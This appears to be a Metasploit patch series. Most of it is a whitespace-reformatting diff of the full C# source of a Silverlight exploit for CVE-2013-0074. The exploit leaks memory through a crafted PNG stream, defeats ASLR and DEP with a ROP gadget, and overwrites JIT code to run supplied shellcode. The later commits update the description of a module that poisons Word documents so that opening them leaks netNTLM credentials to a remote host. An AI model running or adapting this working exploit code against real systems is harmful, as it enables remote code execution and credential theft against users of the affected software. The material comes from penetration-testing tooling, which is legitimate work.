diff --git a/external/source/exploits/cve-2013-0074/SilverApp1/App.xaml.cs b/external/source/exploits/cve-2013-0074/SilverApp1/App.xaml.cs
index fcabe72f15..c3c386304a 100755
--- a/external/source/exploits/cve-2013-0074/SilverApp1/App.xaml.cs
+++ b/external/source/exploits/cve-2013-0074/SilverApp1/App.xaml.cs
@@ -12,54 +12,54 @@ using System.Windows.Shapes;
 
 namespace SilverApp1
 {
-	public partial class App : Application
-	{
+    public partial class App : Application
+    {
 
-		public App()
-		{
-			this.Startup += this.Application_Startup;
-			this.Exit += this.Application_Exit;
-			this.UnhandledException += this.Application_UnhandledException;
+        public App()
+        {
+            this.Startup += this.Application_Startup;
+            this.Exit += this.Application_Exit;
+            this.UnhandledException += this.Application_UnhandledException;
 
-			InitializeComponent();
-		}
+            InitializeComponent();
+        }
 
-		private void Application_Startup(object sender, StartupEventArgs e)
-		{
+        private void Application_Startup(object sender, StartupEventArgs e)
+        {
             this.RootVisual = new MainPage(e.InitParams);
-		}
+        }
 
-		private void Application_Exit(object sender, EventArgs e)
-		{
+        private void Application_Exit(object sender, EventArgs e)
+        {
 
-		}
+        }
 
-		private void Application_UnhandledException(object sender, ApplicationUnhandledExceptionEventArgs e)
-		{
-			// If the app is running outside of the debugger then report the exception using
-			// the browser's exception mechanism. On IE this will display it a yellow alert 
-			// icon in the status bar and Firefox will display a script error.
-			if (!System.Diagnostics.Debugger.IsAttached) {
+        private void Application_UnhandledException(object sender, ApplicationUnhandledExceptionEventArgs e)
+        {
+            // If the app is running outside of the debugger then report the exception using
+            // the browser's exception mechanism. On IE this will display it a yellow alert 
+            // icon in the status bar and Firefox will display a script error.
+            if (!System.Diagnostics.Debugger.IsAttached) {
 
-				// NOTE: This will allow the application to continue running after an exception has been thrown
-				// but not handled. 
-				// For production applications this error handling should be replaced with something that will 
-				// report the error to the website and stop the application.
-				e.Handled = true;
-				Deployment.Current.Dispatcher.BeginInvoke(delegate { ReportErrorToDOM(e); });
-			}
-		}
+                // NOTE: This will allow the application to continue running after an exception has been thrown
+                // but not handled. 
+                // For production applications this error handling should be replaced with something that will 
+                // report the error to the website and stop the application.
+                e.Handled = true;
+                Deployment.Current.Dispatcher.BeginInvoke(delegate { ReportErrorToDOM(e); });
+            }
+        }
 
-		private void ReportErrorToDOM(ApplicationUnhandledExceptionEventArgs e)
-		{
-			try {
-				string errorMsg = e.ExceptionObject.Message + e.ExceptionObject.StackTrace;
-				errorMsg = errorMsg.Replace('"', '\'').Replace("\r\n", @"\n");
+        private void ReportErrorToDOM(ApplicationUnhandledExceptionEventArgs e)
+        {
+            try {
+                string errorMsg = e.ExceptionObject.Message + e.ExceptionObject.StackTrace;
+                errorMsg = errorMsg.Replace('"', '\'').Replace("\r\n", @"\n");
 
-				System.Windows.Browser.HtmlPage.Window.Eval("throw new Error(\"Unhandled Error in Silverlight Application " + errorMsg + "\");");
-			}
-			catch (Exception) {
-			}
-		}
-	}
+                System.Windows.Browser.HtmlPage.Window.Eval("throw new Error(\"Unhandled Error in Silverlight Application " + errorMsg + "\");");
+            }
+            catch (Exception) {
+            }
+        }
+    }
 }
diff --git a/external/source/exploits/cve-2013-0074/SilverApp1/MainPage.xaml.cs b/external/source/exploits/cve-2013-0074/SilverApp1/MainPage.xaml.cs
index 89390ca96d..d0a86c6624 100755
--- a/external/source/exploits/cve-2013-0074/SilverApp1/MainPage.xaml.cs
+++ b/external/source/exploits/cve-2013-0074/SilverApp1/MainPage.xaml.cs
@@ -15,20 +15,20 @@ namespace SilverApp1
     {    
         // raw PNG image data w/o PLTE chunk data // not the shellcode :)
         static byte[] pngStart = {
-			0x89,0x50,0x4E,0x47,0x0D,0x0A,0x1A,0x0A, // PNG header 
-			0,0,0,0x0D,0x49,0x48,0x44,0x52,0,0,0,0x08,0,0,0,0x04,0x08,0x03,0,0,0,0x84,0x13,0x8E,0xC2, // IHDR chunk
-			0,0,0x03,0,0x50,0x4C,0x54,0x45 // PLTE chunk header
-		};
-		static byte[] pngEnd = {
+            0x89,0x50,0x4E,0x47,0x0D,0x0A,0x1A,0x0A, // PNG header 
+            0,0,0,0x0D,0x49,0x48,0x44,0x52,0,0,0,0x08,0,0,0,0x04,0x08,0x03,0,0,0,0x84,0x13,0x8E,0xC2, // IHDR chunk
+            0,0,0x03,0,0x50,0x4C,0x54,0x45 // PLTE chunk header
+        };
+        static byte[] pngEnd = {
             0,0,0,0, // PLTE chunk checksum can be 0      
-			0,0,0,0x2F,0x49,0x44,0x41,0x54,0x78,0xDA,0x01,0x24,0,0xDB,0xFF,0,0,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0,0x08,0x09,0x0A,0x0B,0x0C,0x0D,
-			0x0E,0x0F,0,0x10,0x11,0x12,0x13,0x14,0x15,0x16,0x17,0,0x18,0x19,0x1A,0x1B,0x1C,0x1D,0x1E,0x1F,0x17,0x1C,0x01,0xF1,0x7D,0xBE,0xC7,0x66, // IDAT chunk
-			0,0,0,0,0x49,0x45,0x4E,0x44,0xAE,0x42,0x60,0x82 // IEND chunk
+            0,0,0,0x2F,0x49,0x44,0x41,0x54,0x78,0xDA,0x01,0x24,0,0xDB,0xFF,0,0,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0,0x08,0x09,0x0A,0x0B,0x0C,0x0D,
+            0x0E,0x0F,0,0x10,0x11,0x12,0x13,0x14,0x15,0x16,0x17,0,0x18,0x19,0x1A,0x1B,0x1C,0x1D,0x1E,0x1F,0x17,0x1C,0x01,0xF1,0x7D,0xBE,0xC7,0x66, // IDAT chunk
+            0,0,0,0,0x49,0x45,0x4E,0x44,0xAE,0x42,0x60,0x82 // IEND chunk
         };
         
         Object[] obj;
         public byte[] png;
-		public int offs;
+        public int offs;
 
         // create Stream basing on pngStart[]
         public MyStream() : base(pngStart)
@@ -38,9 +38,9 @@ namespace SilverApp1
         int ReadBuf(byte[] buffer, int offset, int count)
         {         
             // calc true PNG image length
-			int res = pngStart.Length + 0x300 + pngEnd.Length;
-			
-			base.Read(buffer, offset, count); // (count = buffer.Length) < res
+            int res = pngStart.Length + 0x300 + pngEnd.Length;
+
+            base.Read(buffer, offset, count); // (count = buffer.Length) < res
             MainPage.LogAdd("MyStream.Read(["+buffer.Length+"],"+offset+","+count+") = " + res);
             return res;
         }
@@ -50,7 +50,7 @@ namespace SilverApp1
         {
             // allocate arrays sequentially in memory
             int len = pngEnd.Length;
-			obj = new object[] { null, null };	// as PLTE data
+            obj = new object[] { null, null };	// as PLTE data
             png = new byte[0x300 + len - offs]; // as rest PNG data
             MainPage.buf = new uint[3];			// the target array for memory corruption
             MainPage.obj = new object[3];		// aux array
@@ -78,20 +78,20 @@ namespace SilverApp1
         // access protected Initialize()
         public void Init(IntPtr handle)
         {
-			MainPage.LogAdd("ScriptObject.Initialize(" + MainPage.Hex((ulong)handle) + ", 1, true, false)");
-			Initialize(handle, (IntPtr)1, true, false); // call agcore.dll DOM_ReferenceObject()
+            MainPage.LogAdd("ScriptObject.Initialize(" + MainPage.Hex((ulong)handle) + ", 1, true, false)");
+            Initialize(handle, (IntPtr)1, true, false); // call agcore.dll DOM_ReferenceObject()
         }
     }
 
 
-	public partial class MainPage : UserControl
-	{
-		public static RichTextBox tbox;
-		public static uint[] buf;
-		public static ulong bufAddr;
-		public static object[] obj;
-		public static bool is64;
-		public static Version vsn;
+    public partial class MainPage : UserControl
+    {
+        public static RichTextBox tbox;
+        public static uint[] buf;
+        public static ulong bufAddr;
+        public static object[] obj;
+        public static bool is64;
+        public static Version vsn;
         public static byte[] payload;
 
         public MainPage(System.Collections.Generic.IDictionary<string, string> iDictionary)
@@ -101,8 +101,8 @@ namespace SilverApp1
 			tbox = richTxtBox;
 #endif
             // print environment info
-			vsn = Environment.Version;
-			LogAdd("Silverlight: " + vsn.ToString() + "\n" + "OS: " + Environment.OSVersion.ToString());
+            vsn = Environment.Version;
+            LogAdd("Silverlight: " + vsn.ToString() + "\n" + "OS: " + Environment.OSVersion.ToString());
             payload = Convert.FromBase64String(iDictionary["payload"]);
             LogAdd(String.Format("Payload decoded length: {0}", payload.Length));
 #if !DEBUG
@@ -112,15 +112,15 @@ namespace SilverApp1
 #endif
         }
 
-		// prints message into richTextBox
-		public static void LogAdd(string txt)
-		{
+        // prints message into richTextBox
+        public static void LogAdd(string txt)
+        {
 #if DEBUG
 			Paragraph p = new Paragraph();
 			p.Inlines.Add(txt);
 			tbox.Blocks.Add(p);	
 #endif
-		}
+        }
 
         public static void LogAdd(object obj)
         {
@@ -129,16 +129,16 @@ namespace SilverApp1
 #endif
         }
 
-		// converts int to hex string
-		public static string Hex(int u)
-		{
-			return u <= 9 ? u.ToString() : "0x" + u.ToString("X");
-		}
+        // converts int to hex string
+        public static string Hex(int u)
+        {
+            return u <= 9 ? u.ToString() : "0x" + u.ToString("X");
+        }
 
-		public static string Hex(ulong u)
-		{
-			return u <= 9 ? u.ToString() : "0x" + u.ToString("X");
-		}
+        public static string Hex(ulong u)
+        {
+            return u <= 9 ? u.ToString() : "0x" + u.ToString("X");
+        }
 
         // reads pointer from byte[]
         public static ulong ReadAddr(byte[] b, int offs)
@@ -149,34 +149,34 @@ namespace SilverApp1
         }
 
         // writes pointer into byte[]
-		public static void WriteAddr(byte[] b, int offs, ulong u)
+        public static void WriteAddr(byte[] b, int offs, ulong u)
         {
-			for (int i = offs; i < offs + (is64 ? 8:4); i++, u >>= 8) 
+            for (int i = offs; i < offs + (is64 ? 8:4); i++, u >>= 8) 
                 b[i] = (byte)(u & 0xff);      
         }
 
-		// exploits memory disclosure in BitmapSource.SetSourceInternal()
+        // exploits memory disclosure in BitmapSource.SetSourceInternal()
         ulong MemoryDiscl()
         {
             try
-			{
-				// prepare malicious MemoryStream
+            {
+                // prepare malicious MemoryStream
                 MyStream ms = new MyStream();
  
-				// create image based on stream data and data "outside" the stream
-				BitmapImage bi = new BitmapImage();	
-				ms.offs = 39;		// set offset for 32 bit environment
-				bi.SetSource(ms);	// call the vulnerable SetSourceInternal()
-					
-				// check png data parsing results
-				is64 = bi.PixelWidth == 0 || bi.PixelHeight == 0;
-				if (is64) { // error, ok lets try again with the offset for 64 bit
-					ms.offs = 79; 
-					bi.SetSource(ms);
-				}
-	
-				// check png data parsing results
-				if (bi.PixelWidth == 0 || bi.PixelHeight == 0) throw new Exception("Bad PNG data"); // error png parsing
+                // create image based on stream data and data "outside" the stream
+                BitmapImage bi = new BitmapImage();	
+                ms.offs = 39;		// set offset for 32 bit environment
+                bi.SetSource(ms);	// call the vulnerable SetSourceInternal()
+
+                // check png data parsing results
+                is64 = bi.PixelWidth == 0 || bi.PixelHeight == 0;
+                if (is64) { // error, ok lets try again with the offset for 64 bit
+                    ms.offs = 79; 
+                    bi.SetSource(ms);
+                }
+
+                // check png data parsing results
+                if (bi.PixelWidth == 0 || bi.PixelHeight == 0) throw new Exception("Bad PNG data"); // error png parsing
 
                 // ok, now we should pass the diclosed memory into WriteableBitmap to access it as RGB pixel data
                 WriteableBitmap wb = new WriteableBitmap(bi);
@@ -205,31 +205,31 @@ namespace SilverApp1
 
                 // parse memory addresses from b[]
                 ulong hMod  = ReadAddr(b, is64 ?  0:1);		// type pointer for obj[] // we'll need it for mscorlib.ni.dll image base calculation for the ASLR bypass
-				ulong addr1 = ReadAddr(b, is64 ? 24:13);	// obj[0] = address of png[]
-				bufAddr     = ReadAddr(b, is64 ? 32:17);	// obj[1] = address of MainPage.inst.buf[]
+                ulong addr1 = ReadAddr(b, is64 ? 24:13);	// obj[0] = address of png[]
+                bufAddr     = ReadAddr(b, is64 ? 32:17);	// obj[1] = address of MainPage.inst.buf[]
 
-				LogAdd("obj[] type = " + Hex(hMod) + ",  png[] address = " + Hex(addr1) + ",  buf[] address = " + Hex(bufAddr));
+                LogAdd("obj[] type = " + Hex(hMod) + ",  png[] address = " + Hex(addr1) + ",  buf[] address = " + Hex(bufAddr));
 
-				// calc the ROP offset inside mscorlib.ni.dll
-		        // * x86
+                // calc the ROP offset inside mscorlib.ni.dll
+                // * x86
                 // 7997526b 83493440        or      dword ptr [ecx+34h],40h
                 // 7997526f b801000000      mov     eax,1
                 // 79975274 c20400          ret     4
                 // * x64
                 // 000007fe`f03e19d0 895168          mov     dword ptr [rcx+68h],edx
                 // 000007fe`f03e19d3 c3              ret
-				if (Environment.OSVersion.Platform != PlatformID.Win32NT) throw new Exception("Sorry, but the further code works for Windows only.");
-				ulong rop = 0;
-				if (vsn.Major == 5 && vsn.Build == 10411) 
+                if (Environment.OSVersion.Platform != PlatformID.Win32NT) throw new Exception("Sorry, but the further code works for Windows only.");
+                ulong rop = 0;
+                if (vsn.Major == 5 && vsn.Build == 10411) 
                 {
-					rop = (hMod & 0xffffffffffff0000) - (ulong)(is64 ? 0x670000 - 0x4519D0 : 0x470000 - 0x2A526B);
-				}
+                    rop = (hMod & 0xffffffffffff0000) - (ulong)(is64 ? 0x670000 - 0x4519D0 : 0x470000 - 0x2A526B);
+                }
                 else if (vsn.Major == 5 && vsn.Build == 61118) 
                 {
                     rop = (hMod & 0xffffffffffff0000) - (ulong)(is64 ? 0x670000 - 0x4519D0 : 0x470000 - 0x2A520F);
                 } 
 
-				if (rop == 0) throw new Exception("Sorry, but the further code works for vulnerable 5 builds only.");
+                if (rop == 0) throw new Exception("Sorry, but the further code works for vulnerable 5 builds only.");
 
                 // calc object pointer offset inside png2[]
                 ulong addr2 = bufAddr - (ulong)(is64 ? 96:45);
@@ -237,10 +237,10 @@ namespace SilverApp1
 
                 // write vtable pointer
                 WriteAddr(ms.png, k, addr2);
-				// write address of ROP gadget
+                // write address of ROP gadget
                 WriteAddr(ms.png, k + (is64 ? 8:4), rop);
 
-				// ok, return the pointer for ScriptObject.Initialize() exploitation
+                // ok, return the pointer for ScriptObject.Initialize() exploitation
                 return addr2;
             }
             catch (Exception ex)
@@ -251,9 +251,9 @@ namespace SilverApp1
             return 0;
         }
 
-		class ShellHelper32 : Random
-		{
-			// x32 shellcode
+        class ShellHelper32 : Random
+        {
+            // x32 shellcode
             uint[] payload;
 
             // PreCondition : arr.Lenth % 4 == 0
@@ -265,96 +265,96 @@ namespace SilverApp1
                     payload[k] = BitConverter.ToUInt32(arr, i);
                 }
             }
-			
-			// read uint from memory address
-			uint Get(uint addr)
-			{
-				if (addr > 0x10000) return buf[(addr - (uint)bufAddr - 8) >> 2]; else return 0;
-			}
 
-			// write uint into memory address
-			void Set(uint addr, uint val)
-			{
-				if (addr > 0x10000) buf[(addr - (uint)bufAddr - 8) >> 2] = val;
-			}
+            // read uint from memory address
+            uint Get(uint addr)
+            {
+                if (addr > 0x10000) return buf[(addr - (uint)bufAddr - 8) >> 2]; else return 0;
+            }
 
-			// exchange two uint arrays
-			void Exchange(uint addr, uint[] arr)
-			{
-				uint u; 
-				int len = arr.Length;
-				for (int i=0; i < len; i++, addr += 4) {
-					u = Get(addr); Set(addr, arr[i]); arr[i] = u;
-				}
-			}
+            // write uint into memory address
+            void Set(uint addr, uint val)
+            {
+                if (addr > 0x10000) buf[(addr - (uint)bufAddr - 8) >> 2] = val;
+            }
 
-			// declare virtual function for the further DEP bypass
-			public virtual int Payload()
-			{
-				// generate dummy JIT-code
-				if (this == null) LogAdd(ToString());
-				if (this == null) LogAdd(ToString());
-				if (this == null) LogAdd(ToString());
-				if (this == null) LogAdd(ToString());
-				if (this == null) LogAdd(ToString());
+            // exchange two uint arrays
+            void Exchange(uint addr, uint[] arr)
+            {
+                uint u; 
+                int len = arr.Length;
+                for (int i=0; i < len; i++, addr += 4) {
+                    u = Get(addr); Set(addr, arr[i]); arr[i] = u;
+                }
+            }
+
+            // declare virtual function for the further DEP bypass
+            public virtual int Payload()
+            {
+                // generate dummy JIT-code
+                if (this == null) LogAdd(ToString());
+                if (this == null) LogAdd(ToString());
+                if (this == null) LogAdd(ToString());
+                if (this == null) LogAdd(ToString());
+                if (this == null) LogAdd(ToString());
                 LogAdd("Payload() hit!");
-				return 0;
-			}
+                return 0;
+            }
 
-			public virtual void Exec(int oldLen)
-			{
-				try {
-					// generate JIT-code for Payload()
-					Payload();
+            public virtual void Exec(int oldLen)
+            {
+                try {
+                    // generate JIT-code for Payload()
+                    Payload();
 
-					// save pointers within obj[] array after buf[]	
-					obj[0] = buf;
-					obj[1] = this;			
-	
-					// find obj[] array and "this" pointer after buf[] 
-					uint addr = 0;
-					for (int i = 2; i < 64; i++)
-						if (buf[i] == (uint)bufAddr) { addr = buf[i+1]; break; }
+                    // save pointers within obj[] array after buf[]	
+                    obj[0] = buf;
+                    obj[1] = this;
 
-					if (addr == 0) throw new Exception("Can't find obj[]");
+                    // find obj[] array and "this" pointer after buf[] 
+                    uint addr = 0;
+                    for (int i = 2; i < 64; i++)
+                        if (buf[i] == (uint)bufAddr) { addr = buf[i+1]; break; }
 
-					// get (this.type + 2c) -> (vtable + 8) -> Payload() address
-					addr = Get(Get(Get(addr) + 0x2c) + 8);
-					//for (uint i = 0; i < 16; i++) LogAdd(Hex(Get(addr + i*4))); // for RnD
-					LogAdd("Payload() address = " + Hex(addr));
-					if (addr == 0) throw new Exception("Can't find Payload() address");
+                    if (addr == 0) throw new Exception("Can't find obj[]");
 
-					// copy payload over JIT-code memory
-					addr -= addr % 4;
-					Exchange(addr, payload);
+                    // get (this.type + 2c) -> (vtable + 8) -> Payload() address
+                    addr = Get(Get(Get(addr) + 0x2c) + 8);
+                    //for (uint i = 0; i < 16; i++) LogAdd(Hex(Get(addr + i*4))); // for RnD
+                    LogAdd("Payload() address = " + Hex(addr));
+                    if (addr == 0) throw new Exception("Can't find Payload() address");
+
+                    // copy payload over JIT-code memory
+                    addr -= addr % 4;
+                    Exchange(addr, payload);
 
                     uint contents = Get(addr);
 
                     LogAdd("Payload() Address " + Hex(addr) + ", Contents: " + Hex(contents));
 
                     LogAdd("Executing payload...");
-					// exec payload
-					int res = Payload();
+                    // exec payload
+                    int res = Payload();
 
-					// restore JIT memory
-					//Exchange(addr, payload);
+                    // restore JIT memory
+                    //Exchange(addr, payload);
 
-					LogAdd("Payload() returns " + Hex(res));
-				}
-				catch (Exception ex) {
-					LogAdd("Error: " + ex.ToString());
-				}
+                    LogAdd("Payload() returns " + Hex(res));
+                }
+                catch (Exception ex) {
+                    LogAdd("Error: " + ex.ToString());
+                }
 
-				// restore buf[] length
-				buf[0x40000000-1] = (uint)oldLen;
-				LogAdd("buf.Length = " + Hex(buf.Length));
-			}
-		}
+                // restore buf[] length
+                buf[0x40000000-1] = (uint)oldLen;
+                LogAdd("buf.Length = " + Hex(buf.Length));
+            }
+        }
 
-		class ShellHelper64 : ShellHelper32
-		{
-			// x64 shellcode
-			byte[] payload;
+        class ShellHelper64 : ShellHelper32
+        {
+            // x64 shellcode
+            byte[] payload;
 
             public override void SetPayload(byte[] arr)
             {
@@ -364,153 +364,153 @@ namespace SilverApp1
                     payload[i] = arr[i];
                 }
             }
-		 
-			UnmanagedMemoryStream ums;
-			ulong umsAddr;
-			byte[] bb;
 
-			// read ulong from x64 memory address
-			ulong Get(ulong addr)
-			{
-				if (addr < 0x10000) return 0;
+            UnmanagedMemoryStream ums;
+            ulong umsAddr;
+            byte[] bb;
 
-				addr = (addr - bufAddr - 8) >> 2;
-				return ((ulong)buf[addr+1] << 32) + buf[addr];
-			}
+            // read ulong from x64 memory address
+            ulong Get(ulong addr)
+            {
+                if (addr < 0x10000) return 0;
 
-			// write ulong into x64 memory address
-			void Set(ulong addr, ulong val)
-			{
-				if (addr < 0x10000) return;
+                addr = (addr - bufAddr - 8) >> 2;
+                return ((ulong)buf[addr+1] << 32) + buf[addr];
+            }
 
-				addr = (addr - bufAddr - 8) >> 2;
-				buf[addr] = (uint)val;
-				buf[addr+1] = (uint)(val >> 32);		
-			}
+            // write ulong into x64 memory address
+            void Set(ulong addr, ulong val)
+            {
+                if (addr < 0x10000) return;
 
-			// read ulong from x64 memory address using ums
-			ulong Read(ulong addr)
-			{
-				if (addr < 0x10000) return 0;
+                addr = (addr - bufAddr - 8) >> 2;
+                buf[addr] = (uint)val;
+                buf[addr+1] = (uint)(val >> 32);
+            }
 
-				// set ums._mem pointer
-				Set(umsAddr + 8, addr);
+            // read ulong from x64 memory address using ums
+            ulong Read(ulong addr)
+            {
+                if (addr < 0x10000) return 0;
 
-				// read ulong from ums
-				ums.Position = 0;
-				ums.Read(bb, 0, 8);
-				return ReadAddr(bb, 0);
-			}
+                // set ums._mem pointer
+                Set(umsAddr + 8, addr);
 
-			// write ulong into x64 memory address using ums
-			void Write(ulong addr, ulong val)
-			{
-				if (addr < 0x10000) return;
+                // read ulong from ums
+                ums.Position = 0;
+                ums.Read(bb, 0, 8);
+                return ReadAddr(bb, 0);
+            }
 
-				// set ums._mem pointer
-				Set(umsAddr + 8, addr);
+            // write ulong into x64 memory address using ums
+            void Write(ulong addr, ulong val)
+            {
+                if (addr < 0x10000) return;
 
-				// write ulong into ums
-				ums.Position = 0;
-				WriteAddr(bb, 0, val);
-				ums.Write(bb, 0, 8);
-			}
+                // set ums._mem pointer
+                Set(umsAddr + 8, addr);
 
-			// exchange two byte[] arrays
-			void Exchange(ulong addr, byte[] arr)
-			{
-				int len = arr.Length;
-				byte[] b = (byte[])arr.Clone();
-				
-				// set ums._mem pointer
-				Set(umsAddr + 8, addr);
+                // write ulong into ums
+                ums.Position = 0;
+                WriteAddr(bb, 0, val);
+                ums.Write(bb, 0, 8);
+            }
 
-				// read byte[] from ums
-				ums.Position = 0;
-				ums.Read(arr, 0, len);
+            // exchange two byte[] arrays
+            void Exchange(ulong addr, byte[] arr)
+            {
+                int len = arr.Length;
+                byte[] b = (byte[])arr.Clone();
 
-				// write byte[] into ums
-				ums.Position = 0;
-				ums.Write(b, 0, len);
-			}
+                // set ums._mem pointer
+                Set(umsAddr + 8, addr);
 
-			public override void Exec(int oldLen)
-			{
-				try {
-					// generate JIT-code for Payload()
-					Payload();
+                // read byte[] from ums
+                ums.Position = 0;
+                ums.Read(arr, 0, len);
 
-					// create UnmanagedMemoryStream
-					ResourceManager rm = new ResourceManager("System.Windows.g", typeof(Control).Assembly);
-					ums = rm.GetStream("themes/generic.xaml");
-					LogAdd(ums);
-					if (ums == null) throw new Exception("Can't find themes/generic.xaml");
+                // write byte[] into ums
+                ums.Position = 0;
+                ums.Write(b, 0, len);
+            }
 
-					// save pointers within obj[] array after buf[]		
-					obj[0] = buf;
-					obj[1] = this;
-					obj[2] = ums;
+            public override void Exec(int oldLen)
+            {
+                try {
+                    // generate JIT-code for Payload()
+                    Payload();
 
-					// find obj[] array after buf[] 
-					ulong addr = 0; 
-					for (int i = 3; i < 64; i++)
-						if (buf[i] == (uint)bufAddr) {
-							addr = ((ulong)buf[i+3] << 32) + buf[i+2];				
-							umsAddr = ((ulong)buf[i+5] << 32) + buf[i+4]; 
+                    // create UnmanagedMemoryStream
+                    ResourceManager rm = new ResourceManager("System.Windows.g", typeof(Control).Assembly);
+                    ums = rm.GetStream("themes/generic.xaml");
+                    LogAdd(ums);
+                    if (ums == null) throw new Exception("Can't find themes/generic.xaml");
 
-							// ensure that ums was allocated after buf[]
-							for (int j = 0; j < 100 && bufAddr > umsAddr; j++) {
-								ums = rm.GetStream("themes/generic.xaml");
-								obj[2] = ums;
-								umsAddr = ((ulong)buf[i+5] << 32) + buf[i+4]; 
-							}
+                    // save pointers within obj[] array after buf[]		
+                    obj[0] = buf;
+                    obj[1] = this;
+                    obj[2] = ums;
 
-							break; 
-						}
+                    // find obj[] array after buf[] 
+                    ulong addr = 0; 
+                    for (int i = 3; i < 64; i++)
+                        if (buf[i] == (uint)bufAddr) {
+                            addr = ((ulong)buf[i+3] << 32) + buf[i+2];				
+                            umsAddr = ((ulong)buf[i+5] << 32) + buf[i+4]; 
 
-					if (addr == 0) throw new Exception("Can't find obj[]");
-					LogAdd("ums address = " + Hex(umsAddr));
-					if (bufAddr > umsAddr) throw new Exception("Can't allocate ums after buf[]");
+                            // ensure that ums was allocated after buf[]
+                            for (int j = 0; j < 100 && bufAddr > umsAddr; j++) {
+                                ums = rm.GetStream("themes/generic.xaml");
+                                obj[2] = ums;
+                                umsAddr = ((ulong)buf[i+5] << 32) + buf[i+4]; 
+                            }
 
-					//for (uint i = 0; i < 10; i++) LogAdd(Hex(Get(umsAddr+i*8))); // for RnD
+                            break; 
+                        }
 
-					// set ums._access private field to FileAccess.ReadWrite = 3
-					Set(umsAddr + 6*8, 0x300000003);
-					LogAdd("ums.Length = " + ums.Length + ", CanRead = " + ums.CanRead + ", CanWrite = " + ums.CanWrite + ", CanSeek = " + ums.CanSeek);
-					if (!ums.CanRead || !ums.CanWrite) throw new Exception("Can't access ums");
+                    if (addr == 0) throw new Exception("Can't find obj[]");
+                    LogAdd("ums address = " + Hex(umsAddr));
+                    if (bufAddr > umsAddr) throw new Exception("Can't allocate ums after buf[]");
 
-					// ok, we have UnmanagedMemoryStream with controlable private fields, 
-					// so we can set any custom ums._mem pointer and read/write data starting from this pointer
+                    //for (uint i = 0; i < 10; i++) LogAdd(Hex(Get(umsAddr+i*8))); // for RnD
 
-					// get (this.type + 72) -> (vtable + 16) -> Payload() address
-					bb = new byte[8];
-					addr = Read(Read(Read(addr) + 9*8) + 16);
-					//for (uint i = 0; i < 16; i++) LogAdd(Hex(Read(addr + i*8))); // for RnD
-					LogAdd("Payload() address = " + Hex(addr));
-					if (addr == 0) throw new Exception("Can't find Payload() address");
+                    // set ums._access private field to FileAccess.ReadWrite = 3
+                    Set(umsAddr + 6*8, 0x300000003);
+                    LogAdd("ums.Length = " + ums.Length + ", CanRead = " + ums.CanRead + ", CanWrite = " + ums.CanWrite + ", CanSeek = " + ums.CanSeek);
+                    if (!ums.CanRead || !ums.CanWrite) throw new Exception("Can't access ums");
 
-					// copy payload over JIT-code memory
-					Exchange(addr, payload);
+                    // ok, we have UnmanagedMemoryStream with controlable private fields, 
+                    // so we can set any custom ums._mem pointer and read/write data starting from this pointer
 
-					// exec payload
-					int res = Payload();
+                    // get (this.type + 72) -> (vtable + 16) -> Payload() address
+                    bb = new byte[8];
+                    addr = Read(Read(Read(addr) + 9*8) + 16);
+                    //for (uint i = 0; i < 16; i++) LogAdd(Hex(Read(addr + i*8))); // for RnD
+                    LogAdd("Payload() address = " + Hex(addr));
+                    if (addr == 0) throw new Exception("Can't find Payload() address");
 
-					// restore JIT memory
-					//Exchange(addr, payload);
+                    // copy payload over JIT-code memory
+                    Exchange(addr, payload);
 
-					LogAdd("Payload() returns " + Hex(res));			
-				}
-				catch (Exception ex) {
-					LogAdd("Error: " + ex.ToString());
-				}
+                    // exec payload
+                    int res = Payload();
 
-				// restore buf[] length
-				if (bb != null) {
-					Write(bufAddr + 8, (ulong)oldLen);
-					LogAdd("buf.Length = " + Hex(buf.Length));
-				}
-			}
-		}
+                    // restore JIT memory
+                    //Exchange(addr, payload);
+
+                    LogAdd("Payload() returns " + Hex(res));			
+                }
+                catch (Exception ex) {
+                    LogAdd("Error: " + ex.ToString());
+                }
+
+                // restore buf[] length
+                if (bb != null) {
+                    Write(bufAddr + 8, (ulong)oldLen);
+                    LogAdd("buf.Length = " + Hex(buf.Length));
+                }
+            }
+        }
 
         void exploit()
         {
@@ -561,12 +561,12 @@ namespace SilverApp1
         }
 
 
-		void btnClickMe_Click(object sender, RoutedEventArgs e)
+        void btnClickMe_Click(object sender, RoutedEventArgs e)
         {
 #if DEBUG
             exploit();
 #endif
         }
-	}
+    }
 
 }

From ce8b63f240de6886bd0797ecd308db4187c78cdd Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Sun, 24 Nov 2013 01:01:29 -0600
Subject: [PATCH 082/217] Update module name to stay consistent

This module is under the windows/gather, so must be named the same
way like the rest.
---
 modules/post/windows/gather/word_unc_injector.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/windows/gather/word_unc_injector.rb b/modules/post/windows/gather/word_unc_injector.rb
index 613588a999..653e316934 100644
--- a/modules/post/windows/gather/word_unc_injector.rb
+++ b/modules/post/windows/gather/word_unc_injector.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Post
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Microsoft Word UNC Path Injector',
+      'Name'           => 'Windows Gather Microsoft Office Word UNC Path Injector',
       'Description'    => %q{
           This module modifies a remote .docx file that will, upon opening, submit
         stored netNTLM credentials to a remote host. Verified to work with Microsoft

From 48578c3bc0478110e603c527a014a7e5325456a9 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Sun, 24 Nov 2013 23:02:37 -0600
Subject: [PATCH 083/217] Update description about suitable targets

The same technique work for Microsoft Office 2013 as well. Tested.
---
 modules/auxiliary/docx/word_unc_injector.rb      | 4 ++--
 modules/post/windows/gather/word_unc_injector.rb | 4 ++--
 2 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb
index f2c7e94b85..c7b5dd6cde 100644
--- a/modules/auxiliary/docx/word_unc_injector.rb
+++ b/modules/auxiliary/docx/word_unc_injector.rb
@@ -19,8 +19,8 @@ class Metasploit3 < Msf::Auxiliary
         netNTLM credentials to a remote host. It can also create an empty docx file. If
         emailed the receiver needs to put the document in editing mode before the remote
         server will be contacted. Preview and read-only mode do not work. Verified to work
-        with Microsoft Word 2003, 2007 and 2010 as of January 2013. In order to get the
-        hashes the auxiliary/server/capture/smb module can be used.
+        with Microsoft Word 2003, 2007, 2010, and 2013. In order to get the hashes the
+        auxiliary/server/capture/smb module can be used.
       },
       'License'        => MSF_LICENSE,
       'References'     =>
